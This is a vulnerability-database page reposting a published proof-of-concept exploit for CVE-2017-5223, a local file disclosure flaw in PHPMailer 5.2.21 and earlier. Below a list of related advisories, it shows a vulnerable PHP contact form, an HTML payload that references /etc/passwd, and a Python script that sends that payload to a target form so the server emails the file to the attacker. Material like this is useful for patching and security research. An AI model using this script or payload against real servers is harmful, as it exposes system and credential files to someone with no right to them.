Vulners
Lucene search
PHPMailer 5.2.21 Local File Disclosure Exploit
| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
 | phpmailer -- Remote Code Execution | 10 Jan 201700:00 | – | freebsd |
 | Security fix for the ALT Linux 9 package phpipam version 1.27.002-alt1 | 10 Jan 201700:00 | – | altlinux |
 | PHPMailer Information Disclosure Vulnerability | 12 Jan 201700:00 | – | cnvd |
| PHPMailer Arbitrary File Read Vulnerability | 3 Feb 201700:00 | – | cnvd |
 | PHPMailer Local Information Disclosure (CVE-2017-5223) - Ver2 | 11 Apr 201800:00 | – | checkpoint_advisories |
 | CVE-2017-5223 | 16 Jan 201706:00 | – | cve |
 | CVE-2017-5223 | 16 Jan 201706:00 | – | cvelist |
 | [SECURITY] [DLA 1591-1] libphp-phpmailer security update | 23 Nov 201809:41 | – | debian |
| [SECURITY] [DLA 817-1] libphp-phpmailer security update | 6 Feb 201709:00 | – | debian |
 | CVE-2017-5223 | 16 Jan 201706:00 | – | debiancve |
10
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
// PoC //
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
// vulnerable form example //
<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "[email protected]";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>
// exploit //
Put <img src="/etc/passwd"> in the message (or other file to disclose).
// python code //
#!/usr/bin/python
import urllib
import urllib2
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
url = 'http://localhost/contact.php'
email = '[email protected]'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html
# 0day.today [2018-02-16] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Oct 2017 00:00Current
6.1Medium risk
Vulners AI Score6.1
EPSS0.02143